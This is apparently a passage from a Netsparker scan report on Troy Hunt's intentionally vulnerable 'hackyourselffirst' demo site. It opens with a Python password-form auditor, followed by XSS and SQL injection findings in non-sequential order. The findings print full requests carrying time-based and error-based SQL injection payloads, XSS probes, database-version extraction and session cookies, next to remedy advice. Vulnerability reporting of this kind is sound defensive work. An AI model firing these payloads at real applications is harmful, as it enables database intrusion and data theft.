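class _FormCollector(HTMLParser):
    """Collect every <form>, its action and whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if (a.get("type") or "").lower() == "password":
                self._open["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def audit_credential_forms(page_url, page_html):
    """Return (issue, url) pairs for every form on the page that collects a password."""
    collector = _FormCollector()
    collector.feed(page_html)
    page_is_https = urlsplit(page_url).scheme == "https"
    issues = []
    for form in collector.forms:
        if not form["has_password"]:
            continue
        # An empty or relative action resolves against the page URL, as browsers do.
        action = urljoin(page_url, form["action"])
        if urlsplit(action).scheme != "https":
            issues.append(("password transmitted over HTTP", action))
        if not page_is_https:
            issues.append(("critical form served over HTTP", page_url))
    return issues


# Constructed pages mirroring 5.1 (register form posting over HTTP) and 8.1
# (login page served over HTTP whose form posts to HTTPS).
REGISTER_PAGE_URL = "http://hackyourselffirst.troyhunt.com/Account/Register"
REGISTER_PAGE_HTML = """
<form action="http://hackyourselffirst.troyhunt.com/Account/Register" method="post">
  <input type="email" name="Email"><input type="password" name="Password">
</form>"""
LOGIN_PAGE_URL = "http://hackyourselffirst.troyhunt.com/Account/Login"
LOGIN_PAGE_HTML = """
<form action="https://hackyourselffirst.troyhunt.com/Account/Login" method="post">
  <input type="email" name="Email"><input type="password" name="Password">
</form>"""

if __name__ == "__main__":
    for url, body in ((REGISTER_PAGE_URL, REGISTER_PAGE_HTML), (LOGIN_PAGE_URL, LOGIN_PAGE_HTML)):
        for issue in audit_credential_forms(url, body):
            print(f"{url}: {issue[0]} ({issue[1]})")
```

The register page trips both rules; the report records only the transmission issue for /Account/Register because that is the more severe of the two. The only result that satisfies the remedy is an empty list: page and action both on https://, which in practice means redirecting the whole site to HTTPS and sending HSTS.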
3 TOTAL (MEDIUM)
9. [Possible] Cross-site Scripting
Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by rewriting the HTML on the fly to steal the user's credentials. This happens because input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this limits the direct impact to hijacking other users' sessions, an attacker might target an administrator and thereby gain full control over the application.
Although Netsparker believes there is cross-site scripting here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.

Impact: There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking users' active sessions
- Changing the look of the page within the victim's browser
- Mounting a successful phishing attack
- Intercepting data and performing man-in-the-middle attacks

Remedy: This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to the application should be validated and all output should be encoded. Output should be encoded according to the output format and location.
There are a number of pre-defined, well-structured whitelist libraries available for many different environments. Good examples of these include the OWASP Reform and Microsoft Anti-Cross-site Scripting libraries.

Remedy References: [ASP.NET] Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet
External References: XSS Cheat Sheet; OWASP - Cross-site Scripting; XSS Shell; XSS Tunnelling
Classification: OWASP 2010-A2; OWASP 2013-A3; PCI V2.0-6.5.7; PCI V3.0-6.5.7; CWE-79; CAPEC-19; WASC-08
9.1 /api/vote
http://hackyourselffirst.troyhunt.com/api/vote

Parameters
Parameter   Type  Value
userId      POST  1
supercarId  POST  3
comments    POST  '"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Notes: Due to the Content-Type header of the response, exploitation of this vulnerability might not be possible in all browsers, or might not be possible at all. The Content-Type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause cross-site scripting vulnerabilities in browsers with automatic MIME sniffing, such as Internet Explorer. Here the reflection is inside an application/json error body, and the response headers listed below include no X-Content-Type-Options: nosniff, so MIME sniffing is what the manual check needs to establish.
Certainty:
Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments='"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Response
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:47 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2985
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Unclosed quotation mark after the character string '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>)'.\r\nIncorrect syntax near '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>)'.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\r\n   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)\r\n   at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\r\n   at Web.Controllers.VoteController.Post(Vote vote)\r\n   at lambda_method(Closure , Object , Object[] )\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass10.<GetExecutor>b__9(Object instance, Object[] methodParameters)\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.Execute(Object instanc…

9.2 /api/admin
http://hackyourselffirst.troyhunt.com/api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt

Parameters
Parameter  Type  Value
nsextt     GET   "--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>

Notes: Due to the Content-Type header of the response, exploitation of this vulnerability might not be possible in all browsers, or might not be possible at all. The Content-Type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause cross-site scripting vulnerabilities in browsers with automatic MIME sniffing, such as Internet Explorer.
Certainty:

Request
GET /api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:16:09 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2885
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <title>Supercar Leaderboard - Supercar Showdown</title>
    <link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" />
    <meta name="viewport" content="width=device-width" />
    <link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet">
</head>
<body>
<header class="navbar-wrapper">
  <div class="container">
    <div class="navbar navbar-inverse">
      <div class="navbar-inner">
        <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
        </button>
        <a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a>
        <div class="nav-collapse collapse">
          <ul class="nav">
            <li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li>
            <li class="dropdown">
              <a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a>
              <ul class="dropdown-menu">
                <form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form>
                <li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li>
                <li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1.3 /Make/3 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/3?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--

Parameters
Parameter | Type | Value
orderby | GET | 1' WAITFOR DELAY '0:0:25'--

Request
GET /Make/3?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27-- HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:06:47 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 1811
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <title>Paganis - Supercar Showdown</title>
    <link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" />
    <meta name="viewport" content="width=device-width" />
    <link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet">
</head>
<body>
<header class="navbar-wrapper">
  <div class="container">
    <div class="navbar navbar-inverse">
      <div class="navbar-inner">
        <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
        </button>
        <a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a>
        <div class="nav-collapse collapse">
          <ul class="nav">
            <li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li>
            <li class="dropdown">
              <a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a>
              <ul class="dropdown-menu">
                <form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form>
                <li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li>
                <li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1.4 /Make/2 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/2?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--

Parameters
Parameter | Type | Value
orderby | GET | 1' WAITFOR DELAY '0:0:25'--

Request
GET /Make/2?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27-- HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:03:34 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 1811
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <title>McLarens - Supercar Showdown</title>
    <link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" />
    <meta name="viewport" content="width=device-width" />
    <link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet">
</head>
<body>
<header class="navbar-wrapper">
  <div class="container">
    <div class="navbar navbar-inverse">
      <div class="navbar-inner">
        <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
        </button>
        <a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a>
        <div class="nav-collapse collapse">
          <ul class="nav">
            <li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li>
            <li class="dropdown">
              <a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a>
              <ul class="dropdown-menu">
                <form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form>
                <li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li>
                <li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1.5 /api/vote CONFIRMED
http://hackyourselffirst.troyhunt.com/api/vote

Parameters
Parameter | Type | Value
userId | POST | 1
supercarId | POST | 3
comments | POST | ') WAITFOR DELAY '0:0:25'--

Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 68
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%27)+WAITFOR+DELAY+%270%3a0%3a25%27--

Response
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:21:22 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1
TOTAL: 5 (CRITICAL), CONFIRMED: 5

2. SQL Injection
Netsparker identified an SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Netsparker confirmed the vulnerability by executing a test SQL query on the backend database.

Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following types of attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database
- Executing commands on the underlying operating system

Actions to Take
1. See the remedy for solution.
2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
4. Use your web logs and application logs to see if there were any previous but undetected attacks to this resource.

Remedy
A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.

External References: OWASP SQL injection; SQL injection Cheat sheet
Remedy References: MSDN - Protect From SQL injection in ASP.NET
Classification: OWASP 2010-A1, OWASP 2013-A1, PCI V2.0-6.5.1, PCI V3.0-6.5.1, CWE-89, CAPEC-66, WASC-19
2.1 /api/vote CONFIRMED
http://hackyourselffirst.troyhunt.com/api/vote

Parameters
Parameter | Type | Value
userId | POST | 1
supercarId | POST | 3
comments | POST | ' + (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+C…

Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 \n\taug 20 2014 22:37:56 \n\tcopyright (c) microsoft corporation\n
Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 209
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%27%2b+(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns)+%2b%27

Response
…PNET
Content-Length: 2867
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Conversion failed when converting the varchar value '_!@2dilemma' to data type int.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrap…
2.2 /Supercar/Leaderboard CONFIRMED
http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=(select+convert(int%2cCHAR(95)%2b…

Parameters
Parameter | Type | Value
orderBy | GET | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR…
asc | GET | false

Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>

Request
GET /Supercar/Leaderboard?orderBy=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns)&asc=false HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14292
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
    <head>
        <title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
        <meta name="viewport" content="width=device-width" />
        <style>
         body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…
    <body bgcolor="white">
            <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
            <h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
            <b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
            <br><br>
            <b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
            <b>Source Error:</b> <br><br>
            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code>
…e width=100% bgcolor="#ffffcc">
   <tr>
      <td>
          <code><pre>

[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
    </font>
    </body>
</html>
<!-- 
[SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.3 /Make/2 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA…

Parameters
Parameter | Type | Value
orderby | GET | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR…

Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>

Request
GET /Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
    <head>
        <title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
        <meta name="viewport" content="width=device-width" />
        <style>
         body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…
    <body bgcolor="white">
            <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
            <h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
            <b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
            <br><br>
            <b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
            <b>Source Error:</b> <br><br>
            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code>
…e width=100% bgcolor="#ffffcc">
   <tr>
      <td>
          <code><pre>

[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
    </font>
    </body>
</html>
<!-- 
